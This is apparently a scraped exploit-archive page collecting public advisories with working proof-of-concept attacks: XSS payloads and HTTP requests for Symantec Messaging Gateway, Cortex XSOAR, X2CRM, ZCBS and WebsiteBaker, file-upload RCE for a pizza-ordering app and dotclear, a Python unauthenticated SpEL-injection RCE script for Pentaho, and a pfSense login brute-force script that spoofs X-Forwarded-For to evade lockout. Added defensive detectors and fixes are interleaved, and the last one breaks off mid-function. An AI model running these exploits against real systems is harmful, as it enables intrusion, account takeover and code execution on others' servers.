All posts by ISHACK AI BOT
-
Symantec Messaging Gateway 10.7.4 - Stored Cross-Site Scripting (XSS)
# Exploit Title: Symantec Messaging Gateway 10.7.4 - Stored Cross-Site Scripting (XSS)
# Exploit Author: omurugur
# Vendor Homepage: https://support.broadcom.com/external/content/SecurityAdvisories/0/21117
# Version: 10.7.4-10.7.13
# Tested on: [relevant os]
# CVE : CVE-2022-25630
# Author Web: https://www.justsecnow.com
# Author Social: @omurugurrr

An authenticated user can embed malicious content with XSS into the admin group policy page.

Example payload: "/><svg/onload=prompt(document.domain)>

The request below stores the equivalent payload "><img src=x onerror=prompt(location)> in both the adminGroupName and adminGroupDescription fields when saving a new administrator group (AdminGroupPolicyFlow$save.flo).

POST /brightmail/admin/administration/AdminGroupPolicyFlow$save.flo HTTP/1.1
Host: X.X.X.X
Cookie: JSESSIONID=xxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 652
Origin: https://x.x.x.x
Referer: https://x.x.x.x/brightmail/admin/administration/AdminGroupPolicyFlow$add.flo
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

pageReuseFor=add&symantec.brightmail.key.TOKEN=xxx&adminGroupName=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E&adminGroupDescription=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E&adminGroupDescription=&fullAdminRole=true&statusRole=true&statusViewOnly=false&reportRole=true&reportViewOnly=false&policyRole=true&policyViewOnly=false&settingRole=true&settingViewOnly=false&adminRole=true&adminViewOnly=false&submitRole=true&submitViewOnly=false&quarantineRole=true&quarantineViewOnly=false&selectedFolderRights=2&ids=0&complianceFolderIds=1&selectedFolderRights=2&ids=0&complianceFolderIds=10000000

Regards,
Omur UGUR
-
Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)
# Exploit Title: Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)
# Exploit Author: omurugur
# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2022-0020
# Version: 6.5.0 - 6.2.0 - 6.1.0
# Tested on: [relevant os]
# CVE : CVE-2022-0020
# Author Web: https://www.justsecnow.com
# Author Social: @omurugurrr

A stored cross-site scripting (XSS) vulnerability in the Palo Alto Networks Cortex XSOAR web interface enables an authenticated network-based attacker to store a persistent JavaScript payload that will perform arbitrary actions in the Cortex XSOAR web interface on behalf of authenticated administrators who encounter the payload during normal operations.

POST /acc_UAB(MAY)/incidentfield HTTP/1.1
Host: x.x.x.x
Cookie: XSRF-TOKEN=xI=; inc-term=x=; S=x+x+x+x/x==; S-Expiration=x; isTimLicense=false
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://x.x.x.x/acc_UAB(MAY)
Content-Type: application/json
X-Xsrf-Token: 
Api_truncate_results: true
Origin: https://x.x.x.x
Content-Length: 373
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"associatedToAll":true,"caseInsensitive":true,"sla":0,"shouldCommit":true,"threshold":72,"propagationLabels":["all"],"name":"\"/><svg/onload=prompt(document.domain)>","editForm":true,"commitMessage":"Field edited","type":"html","unsearchable":false,"breachScript":"","shouldPublish":true,"description":"\"/><svg/onload=prompt(document.domain)>","group":0,"required":false}

Regards,
Omur UGUR
-
Online-Pizza-Ordering -1.0 - Remote Code Execution (RCE)
## Exploit Title: Online-Pizza-Ordering -1.0 - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 03.30.2023
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html
## Reference: https://portswigger.net/web-security/file-upload

## Description:
A malicious user can request an account from the administrator of this system and then use this vulnerability to destroy or take over every account on it, or worse. Because the upload function is reachable from the administrator account, the malicious user can upload a very dangerous file to the server and execute it via a shell. The status is CRITICAL.

STATUS: HIGH Vulnerability

[+]Exploit:

```php
<?php
// by nu11secur1ty - 2023
// Uploaded to the server and executed there: renames the application
// directory under the XAMPP document root.

// Old Name Of The file
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17";

// New Name For The File
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos";

// using rename() function to rename the file
if (rename($old_name, $new_name)) {
    echo "renamed $old_name -> $new_name\n";
} else {
    echo "rename failed\n";
}
?>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-Pizza-Ordering-1.0)

## Proof and Exploit:
[href](https://streamable.com/szb9qy)

## Time spend:
00:45:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
-
X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Exploit Title: X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Exploit Author: Betul Denizler
# Vendor Homepage: https://x2crm.com/
# Software Link: https://sourceforge.net/projects/x2engine/
# Version: X2CRM v6.6/6.9
# Tested on: Ubuntu Mate 20.04
# Vulnerable Parameter: Actions[subject]
# CVE: CVE-2022-48178
# Date: 27.12.2022

'''
POC REQUEST:
========
POST /c2xrm/x2engine/index.php/actions/update?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 172
Origin: http://localhost
Connection: close
Referer: http://localhost/c2xrm/x2engine/index.php/actions/viewAction?id=1
Cookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; PHPSESSID=kg3n7kcjqtm29fc7n4m72m0bt5; YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; 5d8630d289284e8c14d15b14f4b4dc28=779a63cb39d04cca59b4a3b9b2a4fad817930211a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%224%22%3Bi%3A1%3Bs%3A5%3A%22test2%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; sessionToken=Ncr7UIvK2yPvHzZc8koNW4DaIXxwZnsr
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab&Actions%5Bsubject%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&Actions%5Bpriority%5D=1&Actions%5BactionDescription%5D=test

EXPLOITATION
========
1. Create an action
2. Inject payload to the vulnerable parameter in POST request

Payload: %3Cscript%3Ealert(1)%3C%2Fscript%3E
'''
-
X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated)
# Exploit Title: X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated)
# Exploit Author: Betul Denizler
# Vendor Homepage: https://x2crm.com/
# Software Link: https://sourceforge.net/projects/x2engine/
# Version: X2CRM v6.6/6.9
# Tested on: Ubuntu Mate 20.04
# Vulnerable Parameter: model
# CVE: CVE-2022-48177
# Date: 27.12.2022

'''
POC REQUEST:
========
GET /x2crm/x2engine/index.php/admin/importModels?model=asd%22%3E%3Cbody%20onload=%22alert(4)%22%3E HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; PHPSESSID=959fpkms4abdhtresce9k9rmk3; YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; locationTrackingFrequency=60; locationTrackingSwitch=1; 5d8630d289284e8c14d15b14f4b4dc28=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; sessionToken=FFWkdliSAKgtUbP1dKP4iswyYRelqyQ4
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

EXPLOITATION
========
1. Select Import Records Model in admin settings
2. Inject payload to the vulnerable parameter in GET request

Payload: "><body onload="alert(4)">
'''
-
ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS)
# Exploit Title: ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS)
# Date: 2023-03-30
# CVE: CVE-2023-26692
# Exploit Author: Abdulaziz Saad (@b4zb0z)
# Vendor Homepage: https://www.zcbs.nl
# Version: 4.14k
# Tested on: LAMP, Ubuntu
# Google Dork: inurl:objecten.pl?ident=

---

[#] Vulnerability : `$_GET['ident']`

[#] Exploitation : `https://localhost/cgi-bin/objecten.pl?ident=%3Cimg%20src=x%20onerror=alert(%22XSS%22)%3E`
-
WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)
Exploit Title: WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)
Application: WebsiteBaker
Version: 2.13.3
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://websitebaker.org/pages/en/home.php
Software Link: https://wiki.websitebaker.org/doku.php/en/downloads
Date of found: 02.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================
steps:
1. Anyone who has the authority to create a page can do this.

payload: %3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

POST /admin/pages/add.php HTTP/1.1
Host: localhost
Content-Length: 137
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D; PHPSESSID-WB-0e93a2=pj9s35ka639m9bim2a36rtu5g9
Connection: close

b7faead37158f739=dVhd_I3X7317NvoIzyGpMQ&title=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&type=wysiwyg&parent=0&visibility=public&submit=Add

2. Visit http://localhost/
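The stored and reflected XSS reports above all carry their payload in one request parameter, URL-encoded or JSON-encoded. The following is an added example, not code from any of the advisories or the affected products: a small detector of the kind a WAF rule or a log-review script would use. It decodes every parameter of a form-encoded or JSON body (and of the query string) and reports the parameters whose value contains a `<script>` tag, an HTML tag carrying an `on*` event handler, or a `javascript:` URL. The sample bodies are trimmed copies of the Symantec, Cortex XSOAR, X2CRM and ZCBS requests above; the benign body is constructed.

```python
"""Flagging XSS payloads in captured request parameters (added example)."""
import json
import re
from urllib.parse import parse_qsl, unquote_plus

XSS_PATTERNS = [
    re.compile(r"<\s*script\b", re.I),                        # <script>alert(1)</script>
    re.compile(r"<\s*[a-z][\w-]*[^>]*\bon[a-z]+\s*=", re.I),  # <img src=x onerror=, <svg/onload=
    re.compile(r"javascript\s*:", re.I),                      # href="javascript:..."
]


def flatten_json(obj, prefix=""):
    """Yield (dotted name, value) for every string leaf of a JSON document."""
    if isinstance(obj, dict):
        for key, val in obj.items():
            yield from flatten_json(val, f"{prefix}{key}.")
    elif isinstance(obj, list):
        for idx, val in enumerate(obj):
            yield from flatten_json(val, f"{prefix}{idx}.")
    elif isinstance(obj, str):
        yield prefix.rstrip("."), obj


def parameters(body, content_type):
    """Return (name, value) pairs for a request body, already URL-decoded."""
    if content_type.startswith("application/json"):
        return list(flatten_json(json.loads(body)))
    return parse_qsl(body, keep_blank_values=True)


def find_xss(body, content_type, query=""):
    """Names of parameters (body first, then query string) carrying an XSS payload."""
    hits = []
    params = list(parameters(body, content_type)) + parse_qsl(query, keep_blank_values=True)
    for name, value in params:
        # Decode a second time so a %253C-style double-encoded payload is also caught.
        decoded = unquote_plus(unquote_plus(value))
        if any(pattern.search(decoded) for pattern in XSS_PATTERNS):
            hits.append(name)
    return hits


# Constructed samples, trimmed from the advisories on this page.
SYMANTEC_BODY = ("pageReuseFor=add&symantec.brightmail.key.TOKEN=xxx"
                 "&adminGroupName=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E"
                 "&adminGroupDescription=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E"
                 "&fullAdminRole=true")
XSOAR_BODY = ('{"name":"\\"/><svg/onload=prompt(document.domain)>","type":"html",'
              '"description":"\\"/><svg/onload=prompt(document.domain)>","group":0}')
X2CRM_BODY = ("YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab"
              "&Actions%5Bsubject%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&Actions%5Bpriority%5D=1")
ZCBS_QUERY = "ident=%3Cimg%20src=x%20onerror=alert(%22XSS%22)%3E"
BENIGN_BODY = "title=Hello+World&type=wysiwyg&parent=0"
FORM = "application/x-www-form-urlencoded"

if __name__ == "__main__":
    print(find_xss(SYMANTEC_BODY, FORM))             # ['adminGroupName', 'adminGroupDescription']
    print(find_xss(XSOAR_BODY, "application/json"))  # ['name', 'description']
    print(find_xss(X2CRM_BODY, FORM))                # ['Actions[subject]']
    print(find_xss("", FORM, query=ZCBS_QUERY))      # ['ident']
    print(find_xss(BENIGN_BODY, FORM))               # []
```

The patterns are deliberately narrow (tag plus event handler, script tag, javascript: scheme) so that ordinary HTML in a WYSIWYG field does not trip them; a detector like this is a triage aid, not a substitute for contextual output encoding in the application.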
-
Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)
# Exploit Title: Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)
# Author: dwbzn
# Date: 2022-04-04
# Vendor: https://www.hitachivantara.com/
# Software Link: https://www.hitachivantara.com/en-us/products/lumada-dataops/data-integration-analytics/download-pentaho.html
# Version: Pentaho BA Server 9.3.0.0-428
# CVE: CVE-2022-43769, CVE-2022-43939
# Tested on: Windows 11
# Credits: https://research.aurainfosec.io/pentest/pentah0wnage
# NOTE: This only works on the enterprise edition. Haven't tested it on Linux, but it should work (don't use notepad.exe).
# Unauthenticated RCE via SSTI using CVE-2022-43769 and CVE-2022-43939 (https://research.aurainfosec.io/pentest/pentah0wnage)

import requests
import argparse

parser = argparse.ArgumentParser(description='CVE-2022-43769 + CVE-2022-43939 - Unauthenticated RCE via SSTI')
parser.add_argument('baseurl', type=str, help='base url e.g. http://127.0.0.1:8080/pentaho')
parser.add_argument('--cmd', type=str, default='notepad.exe', nargs='?', help='command to execute (default notepad.exe)', required=False)
args = parser.parse_args()

# The "url" parameter is evaluated as a Spring EL template; the doubled braces are
# f-string escapes, so the server receives #{T(java.lang.Runtime).getRuntime().exec('<cmd>')}.
# The endpoint is reachable without a session, hence unauthenticated RCE.
url = f"{args.baseurl}/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{{T(java.lang.Runtime).getRuntime().exec('{args.cmd}')}}&mgrDn=a&pwd=a"
print("running...")
r = requests.get(url)
if r.text == 'false':
    print("command should've executed! nice.")
else:
    print("didn't work. sadge...")
-
ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path
# Exploit Title: ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Exploit Date: 2023-04-05
# Vendor : https://www.eset.com
# Version : 16.0.26.0
# Tested on OS: Microsoft Windows 11 pro x64

#PoC :
==============

C:\>sc qc ekrn
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ekrn
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\ESET\ESET Security\ekrn.exe"
        LOAD_ORDER_GROUP   : Base
        TAG                : 0
        DISPLAY_NAME       : ESET Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

Note: the BINARY_PATH_NAME in the output above is enclosed in double quotes. An unquoted service path is only exploitable when the path is unquoted, contains spaces, and the attacker can write to one of the intermediate directories (here C:\ or C:\Program Files\ESET); verify all three conditions on the target before treating this as a finding.
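To make that check mechanical, here is an added example that is not part of the advisory: it parses the BINARY_PATH_NAME line of `sc qc` output and applies the actual CreateProcess rule, namely that a path is only hijackable if it is unquoted and the executable portion contains spaces, in which case Windows tries each space-delimited prefix with `.exe` appended before reaching the real binary. Run against the dump in the advisory it reports not vulnerable, because that path is quoted; the second dump is a constructed variant with the quotes removed.

```python
"""Deciding whether an sc qc dump shows an exploitable unquoted service path (added example)."""
import re


def binary_path(sc_qc_output):
    """Return the raw BINARY_PATH_NAME value from sc qc output, or None."""
    match = re.search(r"BINARY_PATH_NAME\s*:\s*(.+)", sc_qc_output)
    return match.group(1).strip() if match else None


def executable_part(path):
    """Drop service arguments: keep everything up to and including the first '.exe'."""
    match = re.match(r"(.+?\.exe)", path, re.IGNORECASE)
    return match.group(1) if match else path


def hijack_candidates(path):
    """Paths CreateProcess would try before the real executable (empty if none)."""
    if path.startswith('"'):
        return []                      # quoted: no ambiguity
    words = executable_part(path).split(" ")
    return [" ".join(words[:i]) + ".exe" for i in range(1, len(words))]


def is_unquoted_vulnerable(sc_qc_output):
    """True when the service path is unquoted and its executable part contains a space."""
    path = binary_path(sc_qc_output)
    return bool(path) and bool(hijack_candidates(path))


# The dump from the advisory above: the path is quoted.
ESET_DUMP = r"""
SERVICE_NAME: ekrn
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\ESET\ESET Security\ekrn.exe"
        LOAD_ORDER_GROUP   : Base
        DISPLAY_NAME       : ESET Service
        SERVICE_START_NAME : LocalSystem
"""

# Constructed: the same service as it would look if the path were unquoted.
UNQUOTED_DUMP = ESET_DUMP.replace('"', "")

if __name__ == "__main__":
    for label, dump in (("advisory dump", ESET_DUMP), ("unquoted variant", UNQUOTED_DUMP)):
        print(label, "->", "VULNERABLE" if is_unquoted_vulnerable(dump) else "not vulnerable")
        for candidate in hijack_candidates(binary_path(dump)):
            print("   attacker would need to create:", candidate)
```

The candidate list is what to test write access against (icacls on `C:\` and `C:\Program Files\ESET` here); without a writable prefix directory an unquoted path is a hygiene issue, not a privilege escalation.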
-
pfsenseCE v2.6.0 - Anti-brute force protection bypass
#!/usr/bin/python3
## Exploit Title: pfsenseCE v2.6.0 - Anti-brute force protection bypass
## Google Dork: intitle:"pfSense - Login"
## Date: 2023-04-07
## Exploit Author: FabDotNET (Fabien MAISONNETTE)
## Vendor Homepage: https://www.pfsense.org/
## Software Link: https://atxfiles.netgate.com/mirror/downloads/pfSense-CE-2.6.0-RELEASE-amd64.iso.gz
## Version: pfSenseCE <= 2.6.0
## CVE: CVE-2023-27100

# Vulnerability
## CVE: CVE-2023-27100
## CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2023-27100
## Security Advisory: https://docs.netgate.com/downloads/pfSense-SA-23_05.sshguard.asc
## Patch: https://redmine.pfsense.org/projects/pfsense/repository/1/revisions/9633ec324eada0b870962d3682d264be577edc66

import requests
import sys
import re
import argparse
import textwrap
from urllib3.exceptions import InsecureRequestWarning

# Expected Arguments
parser = argparse.ArgumentParser(
    description="pfsenseCE <= 2.6.0 Anti-brute force protection bypass",
    formatter_class=argparse.RawTextHelpFormatter,
    epilog=textwrap.dedent('''
        Exploit Usage :
        ./CVE-2023-27100.py -l http://<pfSense>/ -u user.txt -p pass.txt
        ./CVE-2023-27100.py -l http://<pfSense>/ -u /Directory/user.txt -p /Directory/pass.txt'''))
parser.add_argument("-l", "--url", help="pfSense WebServer (Example: http://127.0.0.1/)")
parser.add_argument("-u", "--usersList", help="Username Dictionary")
parser.add_argument("-p", "--passwdList", help="Password Dictionary")
args = parser.parse_args()

if len(sys.argv) < 2:
    print("Exploit Usage: ./CVE-2023-27100.py -h [help] -l [url] -u [user.txt] -p [pass.txt]")
    sys.exit(1)

# Variable
url = args.url
usersList = args.usersList
passwdList = args.passwdList

# Suppress only the single warning from urllib3 needed.
if url.upper().startswith("HTTPS://"):
    requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

print('pfsenseCE <= 2.6.0 Anti-brute force protection bypass')


def login(userlogin, userpasswd):
    session = requests.session()
    r = session.get(url, verify=False)

    # Getting CSRF token value
    csrftoken = re.search(r'input type=\'hidden\' name=\'__csrf_magic\' value="(.*?)"', r.text)
    csrftoken = csrftoken.group(1)

    # Specifying Headers Value
    # The spoofed X-Forwarded-For is what defeats the sshguard-based lockout:
    # the login-failure log records this address instead of the real client.
    headerscontent = {
        'User-Agent': 'Mozilla/5.0',
        'Referer': f"{url}",
        'X-Forwarded-For': '42.42.42.42'
    }

    # POST REQ data
    postreqcontent = {
        '__csrf_magic': f"{csrftoken}",
        'usernamefld': f"{userlogin}",
        'passwordfld': f"{userpasswd}",
        'login': 'Sign+In'
    }

    # Sending POST REQ
    r = session.post(url, data=postreqcontent, headers=headerscontent, allow_redirects=False, verify=False)

    # Conditional loops: a successful login answers with a redirect, not 200
    if r.status_code != 200:
        print('[*] - Found Valid Credential !!')
        print(f"[*] - Use this Credential -> {userlogin}:{userpasswd}")
        sys.exit(0)


# Reading User.txt & Pass.txt files
userfile = open(usersList).readlines()
passfile = open(passwdList).readlines()

for user in userfile:
    user = user.strip()
    for passwd in passfile:
        passwd = passwd.strip()
        login(user, passwd)
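Why the spoofed header works, and what the fix looks like, as an added example that is neither pfSense's nor the exploit's code: a toy model of a failed-login lockout in the style of the sshguard-based protection the exploit bypasses. The packet filter can only block the real source address, but the address that gets banned is whatever the login-failure log records. The vulnerable variant records X-Forwarded-For as sent by the client (the exploit's 42.42.42.42), so the ban lands on the spoofed address and the attacker's real one is never blocked. The fixed variant records the socket peer address and believes X-Forwarded-For only from a trusted reverse proxy. The request dicts, the threshold and the proxy address are constructed for the example.

```python
"""Login lockout keyed on the wrong address, and the corrected version (added example)."""
from collections import Counter

MAX_FAILURES = 3                # ban after this many failed logins
TRUSTED_PROXIES = {"10.0.0.5"}  # assumption: our own reverse proxy, if any


def client_ip_vulnerable(req):
    """Trusts the client-supplied header unconditionally."""
    return req["headers"].get("X-Forwarded-For", req["peer"])


def client_ip_fixed(req):
    """Believes X-Forwarded-For only when the request came from a trusted proxy."""
    xff = req["headers"].get("X-Forwarded-For")
    if xff and req["peer"] in TRUSTED_PROXIES:
        # The proxy appends the address it saw; that is the rightmost entry.
        return xff.split(",")[-1].strip()
    return req["peer"]


def run_lockout(reqs, client_ip):
    """Replay login attempts; return (banned addresses, attempts that reached the form)."""
    failures = Counter()
    banned = set()
    reached_form = 0
    for req in reqs:
        # The firewall rule matches on the real packet source only.
        if req["peer"] in banned:
            continue
        reached_form += 1
        if not req["ok"]:
            logged = client_ip(req)   # what the failure log (and thus the ban) records
            failures[logged] += 1
            if failures[logged] >= MAX_FAILURES:
                banned.add(logged)
    return banned, reached_form


def attacker_burst(n, xff="42.42.42.42"):
    """n wrong passwords from one real address, all carrying the spoofed header."""
    return [{"peer": "203.0.113.7", "headers": {"X-Forwarded-For": xff}, "ok": False}
            for _ in range(n)]


if __name__ == "__main__":
    burst = attacker_burst(20)
    print("vulnerable:", run_lockout(burst, client_ip_vulnerable))  # ({'42.42.42.42'}, 20)
    print("fixed:     ", run_lockout(burst, client_ip_fixed))       # ({'203.0.113.7'}, 3)
```

The design point is that the identity used for rate limiting must be the same one the enforcement layer can act on; any header the client controls fails that test unless a trusted hop set it.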
-
dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated)
Exploit Title: dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated)
Application: dotclear
Version: 2.25.3
Bugs: Remote Code Execution (RCE) (Authenticated) via file upload
Technology: PHP
Vendor URL: https://dotclear.org/
Software Link: https://dotclear.org/download
Date of found: 08.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================
While writing a blog post, images can be uploaded, but a file with a .php extension is rejected. The same payload with a .phar extension is accepted:

<?php echo system("id"); ?>

The file was saved as poc.phar and linked from the post; visiting the uploaded file ran the PHP code.

poc request (saving the post that links to the uploaded /dotclear/public/poc.phar):

POST /dotclear/admin/post.php HTTP/1.1
Host: localhost
Content-Length: 566
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: dcxd=f3bb50e4faebea34598cf52bcef38548b68bc1cc
Connection: close

post_title=Welcome+to+Dotclear%21&post_excerpt=&post_content=%3Cp%3EThis+is+your+first+entry.+When+you%27re+ready+to+blog%2C+log+in+to+edit+or+delete+it.fghjftgj%3Ca+href%3D%22%2Fdotclear%2Fpublic%2Fpoc.phar%22%3Epoc.phar%3C%2Fa%3E%3C%2Fp%3E%0D%0A&post_notes=&id=1&save=Save+%28s%29&xd_check=ca4243338e38de355f21ce8a757c17fbca4197736275ba4ddcfced4a53032290d7b3c50badd4a3b9ceb2c8b3eed2fc3b53f0e13af56c68f2b934670027e12f4e&post_status=1&post_dt=2023-04-08T06%3A37&post_lang=en&post_format=xhtml&cat_id=&new_cat_title=&new_cat_parent=&post_open_comment=1&post_password=

poc video : https://youtu.be/oIPyLqLJS70
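The .phar bypass here and the Roxy Fileman rename/move bypass further down on this page are two faces of the same mistake: an extension denylist that is incomplete, and a check that is applied on upload but not on every other action that can produce a filename. The following is an added example, neither dotclear's nor Roxy Fileman's code: one allowlist-based name check (using Roxy's own ALLOWED_UPLOADS values) applied by upload, rename and move alike, plus a magic-byte check on upload so the declared extension must match the content. The forbidden list is a trimmed copy of the Roxy conf.json shown later; the sample file contents are constructed.

```python
"""One name check for every path that creates a file: upload, rename, move (added example)."""
import os
import re

ALLOWED_EXT = {"bmp", "gif", "png", "jpg", "jpeg"}          # Roxy's ALLOWED_UPLOADS
# Trimmed copy of Roxy's FORBIDDEN_UPLOADS: note that phar, aspx and ashx are absent.
FORBIDDEN_EXT = set("zip js jsp php phtml php3 php4 php5 phps shtml pl sh py cgi exe "
                    "jar vb vbs bat cmd dll msi ps1 htaccess".split())
MAGIC = {b"\x89PNG\r\n\x1a\n": "png", b"\xff\xd8\xff": "jpg",
         b"GIF87a": "gif", b"GIF89a": "gif", b"BM": "bmp"}
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})")  # one dot only: no a.php.jpg


def denylist_allows(name):
    """The weak check: anything not on the forbidden list goes through."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    return ext not in FORBIDDEN_EXT


def safe_name(name):
    """Allowlist check shared by upload, rename and move; returns the bare name or None."""
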